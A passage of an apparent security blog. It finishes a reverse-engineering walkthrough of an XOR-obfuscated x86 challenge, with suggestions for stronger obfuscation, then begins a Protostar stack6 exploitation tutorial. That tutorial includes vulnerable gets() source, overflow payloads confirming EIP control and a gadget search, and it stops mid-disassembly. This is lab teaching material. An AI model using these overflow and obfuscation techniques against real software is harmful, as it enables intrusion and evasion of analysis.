   0x08048077 <+23>:    mov    bh,0x6a
   0x08048079 <+25>:    call   0x804808e <_start+46>
   0x0804807e <+30>:    mov    cl,0x4
   0x08048080 <+32>:    mov    al,BYTE PTR [esi]
   0x08048082 <+34>:    sub    esp,ecx
   0x08048084 <+36>:    inc    ecx
   0x08048085 <+37>:    xor    al,cl
   0x08048087 <+39>:    xor    ecx,ecx
   0x08048089 <+41>:    cmp    eax,0x4
   0x0804808c <+44>:    je     0x8048099 <_start+57>
   0x08048092 <+50>:    lea    ecx,[ebp-0xf]
   0x08048095 <+53>:    mov    dl,0x10
   0x08048097 <+55>:    jmp    0x8048097 <_start+55>
   0x0804809c <+60>:    xor    ebx,ebx
   0x0804809e <+62>:    xor    ecx,ecx
   0x080480a0 <+64>:    mov    edx,ecx
   0x080480a2 <+66>:    jmp    DWORD PTR [esp]
   0x080480a5 <+69>:    jmp    0x804809e <_start+62>
   0x080480aa <+74>:    lea    ecx,[ebp-0x1b]
   0x080480ad <+77>:    mov    dl,0xc
   0x080480af <+79>:    xor    eax,eax
   0x080480b1 <+81>:    mov    al,0x8
   0x080480b3 <+83>:    mov    ebx,0x4
   0x080480b8 <+88>:    sub    eax,ebx
   0x080480ba <+90>:    sub    ebx,eax
   0x080480bc <+92>:    inc    ebx
   0x080480bd <+93>:    int    0x80
   0x080480bf <+95>:    xor    eax,eax
   0x080480c1 <+97>:    xor    ebx,ebx
   0x080480c3 <+99>:    inc    al
   0x080480c5 <+101>:   int    0x80
---Type <return> to continue, or q <return> to quit---
   0x080480c7 <+103>:   call   0x8048069 <_start+9>
   0x080480cc <+108>:   in     eax,dx
   0x080480cd <+109>:   dec    esi
   0x080480ce <+110>:   and    ebp,DWORD PTR gs:[edx]
   0x080480d1 <+113>:   sub    eax,0x3064232b
   0x080480d6 <+118>:   sub    ebp,DWORD PTR [edx]
   0x080480d8 <+120>:   sub    DWORD PTR fs:0x654e0d64,esp
   0x080480df <+127>:   and    ebp,DWORD PTR [edx]
   0x080480e1 <+129>:   sub    eax,0x2964232b
   0x080480e6 <+134>:   and    eax,0x89ee0d64
   0x080480eb <+139>:   mov    ebp,eax
   0x080480ed <+141>:   mov    al,0xc9
   0x080480ef <+143>:   add    eax,edi
   0x080480f1 <+145>:   jmp    0x8048101 <_start+161>
   0x080480f6 <+150>:   lea    edx,[ebp+0x0]
   0x080480f9 <+153>:   mov    BYTE PTR [esp],cl
   0x080480fc <+156>:   dec    esp
   0x080480fd <+157>:   push   0x80480e9
   0x08048102 <+162>:   test   edx,edx
   0x08048104 <+164>:   cmp    BYTE PTR [edx],al
   0x08048106 <+166>:   je     0x8048070 <_start+16>
   0x0804810c <+172>:   mov    ebx,edi
   0x0804810e <+174>:   add    ebx,0x1f
   0x08048111 <+177>:   xor    BYTE PTR [edx],bl
   0x08048113 <+179>:   dec    edx
   0x08048114 <+180>:   ret    
   0x08048115 <+181>:   xor    ebp,ebp
   0x08048117 <+183>:   xor    ecx,ecx
   0x08048119 <+185>:   xor    edx,edx
   0x0804811b <+187>:   inc    edx
   0x0804811c <+188>:   lea    ebp,[esp+ecx*1]
   0x0804811f <+191>:   mov    cl,BYTE PTR [esi+edx*1]
   0x08048122 <+194>:   cmp    cl,al
   0x08048124 <+196>:   je     0x80480e2 <_start+130>
   0x0804812a <+202>:   mov    BYTE PTR [esp],cl
   0x0804812d <+205>:   sub    esp,0x1
   0x08048130 <+208>:   inc    edx
   0x08048131 <+209>:   mov    esp,esp
   0x08048133 <+211>:   cmp    ecx,0x0
---Type <return> to continue, or q <return> to quit---
   0x08048136 <+214>:   jg     0x804810b <_start+171>
   0x0804813c <+220>:   mov    ebp,ebp
   0x0804813e <+222>:   ret    
End of assembler dump.

So it looks as if we've landed in the middle of an instruction.

Near the start of the application (on line 16 above), it jumps it a certain memory address which is the middle of an instruction. The resulting instruction, as seen on line 9, tries to move a value to the address pointed to by the EAX register.

On line 11 you can see that the value in EAX is 0, which is what caused the segfault, 0 is an invalid memory address.

The reason for this is because the original application jumped to static memory addresses, in the application the memory addresses are different so this will need to be fixed for the application to work.

What we need to do is replace any fixed memory addresses with labels. We can find where in the application the memory addresses are meant to go by looking at the original disassembly.

Once we have done this the resulting application is as follows:

global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    One
Two:
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     Three
Eight:
    mov    bh,0x6a
    call   Nine
    mov    cl,0x4
    mov    BYTE al, [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     Eleven
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    Twelve
Nine:
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    [esp]
Twelve:
    jmp    Ten
Eleven:
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
Ten:
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
One:
    call   Two
    in     eax,dx
    dec    esi
    db 0x65,0x23,0x2a
    sub    eax,0x3064232b
    sub    ebp, [edx]
    db 0x64,0x29,0x25,0x64,0x0d,0x4e,0x65
    and    ebp, [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
Three:
    mov    al,0xc9
    add    eax,edi
    jmp    Four
Six:
    lea    edx,[ebp+0x0]
    mov    BYTE [esp],cl
    dec    esp
Seven:
    push   Seven
    test   edx,edx
    cmp    BYTE [edx],al
    je     Eight
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE [edx],bl
    dec    edx
    ret    
Four:
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
Five:
    mov    BYTE cl,[esi+edx*1]
    cmp    cl,al
    je     Six
    mov    BYTE [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     Five
    mov    ebp,ebp
    ret

There are a couple of values here (on lines 55, 59 and 60) which look like memory addresses but they aren't valid memory addresses in the original disassembly so they could just be normal values or, as its in the same section as the invalid instructions, part of some data.

With this done we can test this application:

root@dev:~# nasm -felf32 -o going-or-not-obf-test4.o going-or-not-obf-test4.nasm
root@dev:~# ld -o going-or-not-obf-test4 going-or-not-obf-test4.o
root@dev:~# ./going-or-not-obf-test4
I am not going!

So we have our answer, the author is not going :-)

Method 2: The Hard Way

Here we will attempt to understand the application and figure out what the application does without building and running it.

Although you would have needed some understanding of IA32 to do the previous method, obviously you will need a better understanding of it to do this.

The first step would be what we have already done. Well, there would be no need for the ability to assemble the application, or even have a valid nasm file but we would need to replace any known addresses with labels because this will make the disassembly significantly easier to read.

For this will we just use the nasm file above (going-or-not-obf-test4.nasm), just because it will make this post a little shorter :-)

What we do now is follow the control flow of the application and simplfy it as we go by replacing more complex sequencies with less complex 1's or even only 1 instruction in some cases and removing any dead instructions (instructions which have no effect on the application at all) altogether.

This process is manual deobfuscation and can be applied to small sections of applications instead of just full applications like the last method.

Let's start with the first instruction mov edx,eax, this looks like it is a junk line (or dead code) mainly because this is the first instruction of the application, if this was just a code segment instead of a full application this code would be more likely to be meaningful.

The second instruction mov edi,0x25, is also very difficult to quickly determine its usefulness to the application, what we need to do here is take note of the value inside the EDI register.

The next 4 instructions do something interesting, if you follow the control flow of the application and line the instructions sequentially you get:

  jmp    One
One:
  call   Two
Two:
  mov    bl,0x32
  pop    esi

So the 3rd instruction (on line 5) is not related here, and is similar to the previous mov instruction, just make a note that bl contains 0x32.

The other 3 instructions are using a technique used in some shellcode to get the an address in memory when the code might start at a different point in memory.

Its called the JMP-CALL-POP technique and gets the address of the address immediately following the call instruction into the register used in the pop instruction.

Knowing this we can replace the entire code above with:

1 2	`mov bl,0x32` mov esi, One

Let's look at the next 4 instructions:

  xor    eax,eax
  je     Three
Three:
  mov    al,0xc9
  add    eax,edi

So here, on line 5, we use the EDI register, we zero EAX, set it to 0xc9 (201), adds it to EDI (0x25 or 37) and stores the result in EAX, this series of instructions are what is called constant unfolding where a series of instructions are done to work out the actual required value instead of just assigning the value to begin with.

We could use the opposite, a common compiler optimization constant folding, to decrease the complexity of this code, so these 4 instructions could be replaced by:

1	`mov eax,0xee`

The next 5 instructions are:

  jmp    Four
Four:
  xor    ebp,ebp
  xor    ecx,ecx
  xor    edx,edx
  inc    edx

This set of instructions just sets EBP and ECX to 0 and EDX to 1. Now its obvious that the instrction at the beginning was dead code because EDX hasn't been used at all and now it has been overwritten.

We can rewrite the application so far in a much more simplfied way:

_start:
  mov    edi,0x25
  mov    bl,0x32
  mov    esi, One
  mov    eax,0xee
  xor    ebp,ebp
  xor    ecx,ecx
  mov    edx,0x1

As you can see, this is much easier to read than the previous code that was jumping about all over the place.

I kept the assignment to EDI (on line 2) there because, although I've removed the need for it in assigning the value of EAX (on line 5), it still might be used in the future.

Also, the assignment to bl (on line 3) still might not be needed but we shall keep it there just incase.

Let's quickly review the state of the registers:

EDI = 0x25
BL = 0x32
ESI = (Address of One) One
EAX = 0xee
EBP = 0x0
ECX = 0x0
EDX = 0x1

The register state and code rewrite should be constantly updated as you go through the code.

The next instruction is lea ebp,[esp+ecx*1], which is the same as EBP = ESP + ECX * 1 or EBP = ESP + 0 * 1 or EBP = ESP.

After this instruction we enter the following loop:

Five:
  mov    BYTE cl,[esi+edx*1]
  cmp    cl,al
  je     Six
  mov    BYTE [esp],cl
  sub    esp,0x1
  inc    edx
  mov    esp,esp
  cmp    ecx,0x0
  jg     Five
  mov    ebp,ebp
  ret

So this first moves a byte at ESI + EDX * 1, which is basically just ESI + EDX, into the cl register. We know at this point the value inside EDX is 1 and that ESI points to some address in the middle of the application, so our loop will start getting data 1 byte after that address.

This byte is them compared with al, which we know is 0xee, and if they are the same execution will jump to Six.

Providing the jump to Six isn't taken, the byte is moved to the top of the stack (which ESP points to), ESP is adjusted accordingly, EDX is incremented by 1 and the loop is rerun.

The mov instruction on line 8 doesn't do anything, dead code which can be removed.

Now we can find all of the data that is being worked on here:

1	`4e 65 23 2a 2d 2b 23 64 30 2b 2a 64 29 25 64 0d 4e 65 23 2a 2d 2b 23 64 29 25 64 0d ee`

The starting address of this data is 80480bc in the original disassembly, which is 1 byte after the address of the instruction following the call instruction in the jmp-call-pop routine at the start of the application.

It ends with the ee value because this is the point at which the jump to Six is taken.

Also, notice that nowhere here is a 0x0 (or 00) byte, this means that the jg (jump if greater than) instruction on line 10 will always be taken, every byte there is above 0 so the 2 instructions after are dead code and can be removed from the analysis and the jg can be replaced with a jmp.

It is clear that this data, which is sitting in the middle of the application, is being put on the stack for some reason, the lea instruction right before the loop just saved the address pointing to the beginning of the new location of the data on the stack into the EBP register.

We could try to figure out how meaningful this data is now but it would be best to have a look to see what the application does with it first.

Now let's take the jump to Six:

1
2
3

  lea    edx,[ebp+0x0]
  mov    BYTE [esp],cl
  dec    esp

First it loads the address of the data on the stack, currently in EBP, into EDX.

cl, which is currently 0xee, is put onto the stack and ESP is adjusted accordingly.

We then enter into the 2nd loop:

Seven:
  push   Seven
  test   edx,edx
  cmp    BYTE [edx],al
  je     Eight
  mov    ebx,edi
  add    ebx,0x1f
  xor    BYTE [edx],bl
  dec    edx
  ret

This is a very unusual loop, you will only see this type of code when reversing obfuscated code.

It started by pushing its own address to the stack, this allows the ret on line 10 to return to Seven.

The test instruction on line 3 is dead code because all test does is set EFLAGS, but they are immediately overwritten by the cmp instruction that follows.

Lines 4 and 5 again test the value of a byte in the data, this time pointed to by EDX, against 0xee and jump's to Eight when its reached.

The next 2 instructions, lines 6 and 7, move the value from EDI into EBX and add's 0x1f to it. We already know that 0x25 is currently in EDI, so EBX = 0x25 + 0x1f or EBX = 0x44.

The byte in the data is then xor'd with bl (or 0x44) and EDX is decremented.

Clearly this is a simply xor encoding of the data, I wrote a python script a while ago to xor a number of bytes with 1 byte and output both the resulting bytes as ascii characters, and the same but with the characters reversed (due to little endian architectures), here is the script:

#!/usr/bin/env python

import sys

string = sys.argv[1]
xor = sys.argv[2]
decoded = ""

for c in string:
    decoded += chr(ord(c) ^ ord(xor))


print "String as is:"
print decoded

print "\n\nString reversed:"
print decoded[::-1]

This script is very simple, 1 thing to bare in mind though is that, because we are dealing with data outside of the printable ascii range (0x20 - 0x7e), we can just type the characters on the command line.

So we run the script like this:

root@dev:~# python xor-and-ascii.py $(python -c 'print "\x4e\x65\x23\x2a\x2d\x2b\x23\x64\x30\x2b\x2a\x64\x29\x25\x64\x0d\x4e\x65\x23\x2a\x2d\x2b\x23\x64\x29\x25\x64\x0d"') $(python -c 'print "\x44"')
String as is:

!gniog ton ma I
!gniog ma I


String reversed:
I am going!
I am not going!

So now we know what that data is in the middle of the application, clearly it was done like this to confuse but we have reversed enough of the application now to figure out what this is.

With this is mind, we no longer need those 2 loops, or any of the code aimed at moving and decoding the data, we can simply put it in as is.

Let's review our rewritten application:

_start:
  mov    edi,0x25
  mov    esi,One
  mov    ebp,not+0xf
  mov    ebx,0x44
  mov    ecx,0xee
  mov    eax,ecx
  mov    edx,am
One:
  db 0xed
  am: db "I am going!",0xa
  not: db "I am not going!",0xa

I have obviously removed most of the code because it simply isn't needed now, I've made sure that EBP still points to the end of the data and EDX to the beginning just incase there is some reason for this, but most of the code so far was devoted to decoding the data which is no longer needed.

Now for the registers:

EDI = 0x25
EBX = 0x44
ESI = (Address of One) One
EAX = 0xee
EBP = (Address of the end of the data) not+0xf
ECX = 0xee
EDX = (Address of the beginning of the data) am

The next 5 instructions show another weird use of call and jmp:

Eight:
  mov    bh,0x6a
  call   Nine
Nine:
  xor    ebx,ebx
  xor    ecx,ecx
  mov    edx,ecx
  jmp    [esp]

Firstly there is an assignment to bh (the second 8 bits of the EBX register) but then, on line 5, the whole EBX register is cleared using xor so line 2 is dead code.

The call instruction on line 3 and the jmp instruction on line 8 seem to be used just to confuse the reverser, there is no reason for this, but bare in mind that this would have stuck 4 bytes on the stack, next to the decoded data, which hasn't been cleaned up (this could effect the application in some way).

The rest of this code just zero's out EBX, ECX and EDX.

The next 8 instructions are very interesting:

  mov    cl,0x4
  mov    BYTE al, [esi]
  sub    esp,ecx
  inc    ecx
  xor    al,cl
  xor    ecx,ecx
  cmp    eax,0x4
  je     Eleven

Lines 1 and 3 fix the value of ESP after the call, jmp sequence earlier.

The rest xor's 0x5 with the byte at One and compares the result with 0x4. We can test this out in python, we know the byte at One is 0xed, so:

root@dev:~# python
Python 2.7.3 (default, Mar 14 2014, 11:57:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = "\xed"
>>> b = "\x05"
>>> hex(ord(a) ^ ord(b))
'0xe8'

This isn't equal to 0x4 so the jump on line 8 will not be taken.

The next instruction lea ecx,[ebp-0xf] loads EBP - 16 into ECX, ECX will now point to somewhere in the middle of the data (it will actually point 16 characters from the end, which is the start of the string I am not going!).

We can probably guess at what this is going to do from here but let's finish the analysis.

0x10 is then loaded into EDX and then 2 unconditional jumps are taken:

1
2
3

  jmp    Twelve
Twelve:
  jmp    Ten

The only reason for these jumps is to confuse the reverser, we can just ignore them.

The next 7 lines is a very important part of the application:

  xor    eax,eax
  mov    al,0x8
  mov    ebx,0x4
  sub    eax,ebx
  sub    ebx,eax
  inc    ebx
  int    0x80

So lines 1-4 set EAX to 0x4, lines 5 and 6 set EBX to 0x1 and then the interrupt *0x80 is initiated.

Interrupt 0x80 is a special interrupt which initiates a system call, the system call number has to be stored in EAX, which is 0x4 at this moment in time.

We can figure out what system call this is:

1 2	`root@dev:~# grep ' 4$' /usr/include/i386-linux-gnu/asm/unistd_32.h` #define __NR_write 4

This makes sense, the prototype for this syscall is:

1	`ssize_t write(int fd, const void *buf, size_t count);`

Each of the arguments go in EBX, ECX and EDX. So to write to stdout, EBX should be 1 which it is.

ECX should point to the string, which it currently points to I am not going!, and EDX should contain the number of characters to print which it does.

The last 4 instructions just run another syscall, exit, you can check this yourself if you wish:

  xor    eax,eax
  xor    ebx,ebx
  inc    al
  int    0x80

Obviously we can now wrtie this in a much simpler way, but there is no need, we know exactly what this application does and how it does it.

Improving Obfuscation

As I mentioned earlier, the obfuscation could have been done better to make the reversing process harder. I actually purposefully made the obfuscation weaker than I could have to make the challenge easier.

Inserting more junk data inbetween some instructions could make the static disassembly significantly more difficult to read and understand.

I have to actually add a byte (0x89) at the end of the data section because the next few instructions were being obfuscated in a way that made them unreadable:

 80480d5:   25 64 0d ee 89          and    eax,0x89ee0d64
 80480da:   c5 b0 c9 01 f8 eb       lds    esi,FWORD PTR [eax-0x1407fe37]
 80480e0:   1f                      pop    ds
 80480e1:   8d 55 00                lea    edx,[ebp+0x0]
 80480e4:   88 0c 24                mov    BYTE PTR [esp],cl
 80480e7:   4c                      dec    esp

The disassembly shown here has had the last byte of the data removed and is the last line of the data section; and a few lines after.

As you can see the byte following the data section has been moved to the data section and as a result the next few instructions have been incorrectly disassembled.

This method can be implemented throughout the whole application, making most of the instructions disassemble incorrectly.

Constant unfolding could be improved here, for instance:

  mov    al,0x8
  mov    ebx,0x4
  sub    eax,ebx
  sub    ebx,eax
  inc    ebx
  int    0x80

Could be rewritten to:

  push 0xff7316ca
  xor [esp], 0x8ce931
  mov eax, 0xffffffff
  sub eax, [esp]
  push eax
  shl [esp], 0x4
  sub [esp], 0x3f
  pop ebx
  int 0x80

They both do the same thing but the second is a little harder to read, you could obviously keep extending this by implementing more and more complex algorithms to work out your required value.

This can also be applied to references to memory addresses, for instance, if you want to jump to a certain memory address, do some maths to work out the memory address before jumping there.

More advanced instructions could be used like imul, idiv, cmpsb, rol, stosb, rep, movsx, fadd, fcom... The list goes on...

The MMX and other unusual registers could have been taken advantage of.

Also, the key to decrypt the data could have been a command line argument or somehow retreived from outside of the application, this way it would have been extremely difficult decode the data.

Conclusion

There are sometimes easier ways to get a result other than reversing the whole application, maybe just understanding a few bits might be enough.

Although there are ways to make the reversers job more difficult, its never possible to make it impossible to reverse, providing the reverser is able to run the application (if the CPU can see the instructions, then so can the reverser).

A good knowledge of assembly is needed to do any type of indepth reverse engineering.

Ret2Libc and ROP

eXploit

By: 0xe7

6 August 2014 at 14:43

So far, all of our exploits have included shellcode, on most (if not all) modern systems it isn't possible to just run shellcode like this because of NX.

NX disallows running code in certain memory segments, primarily memory segments that contain variable data, like the stack and heap.

A number of techniques were created to beat NX and I want to demostrate 2 of them here, return to libc (Ret2Libc) and return-oriented programming (ROP).

This will be slightly different to my previous posts as I will not be hacking an application that I wrote but instead taking on 2 challenges from the protostar section of exploit exercises.

The challenges that we will look at here are stack6 and stack7.

While these challenges have both NX and ASLR disabled they both implement their own protection which disables the straight running of shellcode.

Stack6: The App

So if you look at the webpage for stack6, it actually gives you the source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
    printf("bzzzt (%p)\n", ret);
    _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

The buffer overflow is on line 13, the application then gets the function return address on line 15 and checks it on line 17.

If the return address begins with bf the application exits, stack addresses normally begin with bf so you cannot just overwrite it with an address on the stack.

One other thing to notice here is that the vulnerable line is using the gets function, this function will only stop once it reaches a newline (\n) or end of file (EOF) character so we do not need to avoid null (\0) characters.

Stack6: The Easy Way

While I've written this post to demonstrate Ret2Libc and ROP we can get our shellcode to run on these 2 challenges using the exact same method which I'll explain quickly here.

So our buffer is 64 bytes long, we have the local variable ret which is 4 bytes, then we have the saved EBP from main's stack frame and finally the return address, its worth noting that the stack has to be 16 byte aligned so 8 will need to be added before you get to the return address. So we need to write 64+4+4+8 = 80 bytes before we overwrite the return address and hijack EIP.

Lets test this:

$ bash
user@protostar:~$ cd /opt/protostar/bin/
user@protostar:/opt/protostar/bin$ python -c 'print "A"*80' > /tmp/t
user@protostar:/opt/protostar/bin$ python -c 'print "A"*84' > /tmp/t2
user@protostar:/opt/protostar/bin$ gdb -q ./stack6
Reading symbols from /opt/protostar/bin/stack6...done.
(gdb) r < /tmp/t
Starting program: /opt/protostar/bin/stack6 < /tmp/t
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�AAAAAAAAAAAA� �

Program received signal SIGSEGV, Segmentation fault.
0x08048507 in main (argc=Cannot access memory at address 0x41414149
) at stack6/stack6.c:31
31  stack6/stack6.c: No such file or directory.
    in stack6/stack6.c
(gdb) r < /tmp/t2
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack6 < /tmp/t2
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

So we were correct, we can now test what happens if we write an address beginning with bf:

1 2	`user@protostar:/opt/protostar/bin$ python -c 'print "A"*80 + "\x00\x00\x00\xbf"' \| ./stack6` input path please: bzzzt (0xbf000000)

As you can see we've hit the printf inside the if statement and exited without seg faulting.

If there was a jmp esp or ff e4 in the application code we could use the same method we used in the beating ASLR post but that isn't the case here.

We can still run our shellcode though using a slightly more complex method, the application is only checking the return address of the current function (note the argument to the __builtin_return_address function call), so we just need to make sure that this address doesn't start with bf.

We'll do this by using 1 ROP "gadget", let's first find the address of our gadget:

user@protostar:/opt/protostar/bin$ objdump -d ./stack6 -M intel

./stack6:     file format elf32-i386


Disassembly of section .init:

08048330 <_init>:
 8048330:   55                      push   ebp
 8048331:   89 e5                   mov    ebp,esp
 8048333:   53                      push   ebx
 8048334:   83 ec 04                sub    esp,0x4
 8048337:   e8 00 00 00 00          call   804833c <_init+0xc>
 804833c:   5b                      pop    ebx
 804833d:   81 c3 b0 13 00 00       add    ebx,0x13b0
 8048343:   8b 93 fc ff ff ff       mov    edx,DWORD PTR [ebx-0x4]
 8048349:   85 d2                   test   edx,edx
 804834b:   74 05                   je     8048352 <_init+0x22>
 804834d:   e8 1e 00 00 00          call   8048370 <__gmon_start__@plt>
 8048352:   e8 09 01 00 00          call   8048460 <frame_dummy>
 8048357:   e8 24 02 00 00          call   8048580 <__do_global_ctors_aux>
 804835c:   58                      pop    eax
 804835d:   5b                      pop    ebx
 804835e:   c9                      leave  
 804835f:   c3                      ret    

Disassembly of section .plt:

08048360 <__gmon_start__@plt-0x10>:
 8048360:   ff 35 f0 96 04 08       push   DWORD PTR ds:0x80496f0
 8048366:   ff 25 f4 96 04 08       jmp    DWORD PTR ds:0x80496f4
 804836c:   00 00                   add    BYTE PTR [eax],al
    ...

08048370 <__gmon_start__@plt>:
 8048370:   ff 25 f8 96 04 08       jmp    DWORD PTR ds:0x80496f8
 8048376:   68 00 00 00 00          push   0x0
 804837b:   e9 e0 ff ff ff          jmp    8048360 <_init+0x30>

08048380 <gets@plt>:
 8048380:   ff 25 fc 96 04 08       jmp    DWORD PTR ds:0x80496fc
 8048386:   68 08 00 00 00          push   0x8
 804838b:   e9 d0 ff ff ff          jmp    8048360 <_init+0x30>

08048390 <__libc_start_main@plt>:
 8048390:   ff 25 00 97 04 08       jmp    DWORD PTR ds:0x8049700
 8048396:   68 10 00 00 00          push   0x10
 804839b:   e9 c0 ff ff ff          jmp    8048360 <_init+0x30>

080483a0 <_exit@plt>:
 80483a0:   ff 25 04 97 04 08       jmp    DWORD PTR ds:0x8049704
 80483a6:   68 18 00 00 00          push   0x18
 80483ab:   e9 b0 ff ff ff          jmp    8048360 <_init+0x30>

080483b0 <fflush@plt>:
 80483b0:   ff 25 08 97 04 08       jmp    DWORD PTR ds:0x8049708
 80483b6:   68 20 00 00 00          push   0x20
 80483bb:   e9 a0 ff ff ff          jmp    8048360 <_init+0x30>

080483c0 <printf@plt>:
 80483c0:   ff 25 0c 97 04 08       jmp    DWORD PTR ds:0x804970c
 80483c6:   68 28 00 00 00          push   0x28
 80483cb:   e9 90 ff ff ff          jmp    8048360 <_init+0x30>

Disassembly of section .text:

080483d0 <_start>:
 80483d0:   31 ed                   xor    ebp,ebp
 80483d2:   5e                      pop    esi
 80483d3:   89 e1                   mov    ecx,esp
 80483d5:   83 e4 f0                and    esp,0xfffffff0
 80483d8:   50                      push   eax
 80483d9:   54                      push   esp
 80483da:   52                      push   edx
 80483db:   68 10 85 04 08          push   0x8048510
 80483e0:   68 20 85 04 08          push   0x8048520
 80483e5:   51                      push   ecx
 80483e6:   56                      push   esi
 80483e7:   68 fa 84 04 08          push   0x80484fa
 80483ec:   e8 9f ff ff ff          call   8048390 <__libc_start_main@plt>
 80483f1:   f4                      hlt    
 80483f2:   90                      nop
 80483f3:   90                      nop
 80483f4:   90                      nop
 80483f5:   90                      nop
 80483f6:   90                      nop
 80483f7:   90                      nop
 80483f8:   90                      nop
 80483f9:   90                      nop
 80483fa:   90                      nop
 80483fb:   90                      nop
 80483fc:   90                      nop
 80483fd:   90                      nop
 80483fe:   90                      nop
 80483ff:   90                      nop

08048400 <__do_global_dtors_aux>:
 8048400:   55                      push   ebp
 8048401:   89 e5                   mov    ebp,esp
 8048403:   53                      push   ebx
 8048404:   83 ec 04                sub    esp,0x4
 8048407:   80 3d 24 97 04 08 00    cmp    BYTE PTR ds:0x8049724,0x0
 804840e:   75 3f                   jne    804844f <__do_global_dtors_aux+0x4f>
 8048410:   a1 28 97 04 08          mov    eax,ds:0x8049728
 8048415:   bb 10 96 04 08          mov    ebx,0x8049610
 804841a:   81 eb 0c 96 04 08       sub    ebx,0x804960c
 8048420:   c1 fb 02                sar    ebx,0x2
 8048423:   83 eb 01                sub    ebx,0x1
 8048426:   39 d8                   cmp    eax,ebx
 8048428:   73 1e                   jae    8048448 <__do_global_dtors_aux+0x48>
 804842a:   8d b6 00 00 00 00       lea    esi,[esi+0x0]
 8048430:   83 c0 01                add    eax,0x1
 8048433:   a3 28 97 04 08          mov    ds:0x8049728,eax
 8048438:   ff 14 85 0c 96 04 08    call   DWORD PTR [eax*4+0x804960c]
 804843f:   a1 28 97 04 08          mov    eax,ds:0x8049728
 8048444:   39 d8                   cmp    eax,ebx
 8048446:   72 e8                   jb     8048430 <__do_global_dtors_aux+0x30>
 8048448:   c6 05 24 97 04 08 01    mov    BYTE PTR ds:0x8049724,0x1
 804844f:   83 c4 04                add    esp,0x4
 8048452:   5b                      pop    ebx
 8048453:   5d                      pop    ebp
 8048454:   c3                      ret    
 8048455:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048459:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]

08048460 <frame_dummy>:
 8048460:   55                      push   ebp
 8048461:   89 e5                   mov    ebp,esp
 8048463:   83 ec 18                sub    esp,0x18
 8048466:   a1 14 96 04 08          mov    eax,ds:0x8049614
 804846b:   85 c0                   test   eax,eax
 804846d:   74 12                   je     8048481 <frame_dummy+0x21>
 804846f:   b8 00 00 00 00          mov    eax,0x0
 8048474:   85 c0                   test   eax,eax
 8048476:   74 09                   je     8048481 <frame_dummy+0x21>
 8048478:   c7 04 24 14 96 04 08    mov    DWORD PTR [esp],0x8049614
 804847f:   ff d0                   call   eax
 8048481:   c9                      leave  
 8048482:   c3                      ret    
 8048483:   90                      nop

08048484 <getpath>:
 8048484:   55                      push   ebp
 8048485:   89 e5                   mov    ebp,esp
 8048487:   83 ec 68                sub    esp,0x68
 804848a:   b8 d0 85 04 08          mov    eax,0x80485d0
 804848f:   89 04 24                mov    DWORD PTR [esp],eax
 8048492:   e8 29 ff ff ff          call   80483c0 <printf@plt>
 8048497:   a1 20 97 04 08          mov    eax,ds:0x8049720
 804849c:   89 04 24                mov    DWORD PTR [esp],eax
 804849f:   e8 0c ff ff ff          call   80483b0 <fflush@plt>
 80484a4:   8d 45 b4                lea    eax,[ebp-0x4c]
 80484a7:   89 04 24                mov    DWORD PTR [esp],eax
 80484aa:   e8 d1 fe ff ff          call   8048380 <gets@plt>
 80484af:   8b 45 04                mov    eax,DWORD PTR [ebp+0x4]
 80484b2:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 80484b5:   8b 45 f4                mov    eax,DWORD PTR [ebp-0xc]
 80484b8:   25 00 00 00 bf          and    eax,0xbf000000
 80484bd:   3d 00 00 00 bf          cmp    eax,0xbf000000
 80484c2:   75 20                   jne    80484e4 <getpath+0x60>
 80484c4:   b8 e4 85 04 08          mov    eax,0x80485e4
 80484c9:   8b 55 f4                mov    edx,DWORD PTR [ebp-0xc]
 80484cc:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx
 80484d0:   89 04 24                mov    DWORD PTR [esp],eax
 80484d3:   e8 e8 fe ff ff          call   80483c0 <printf@plt>
 80484d8:   c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1
 80484df:   e8 bc fe ff ff          call   80483a0 <_exit@plt>
 80484e4:   b8 f0 85 04 08          mov    eax,0x80485f0
 80484e9:   8d 55 b4                lea    edx,[ebp-0x4c]
 80484ec:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx
 80484f0:   89 04 24                mov    DWORD PTR [esp],eax
 80484f3:   e8 c8 fe ff ff          call   80483c0 <printf@plt>
 80484f8:   c9                      leave  
 80484f9:   c3                      ret    

080484fa <main>:
 80484fa:   55                      push   ebp
 80484fb:   89 e5                   mov    ebp,esp
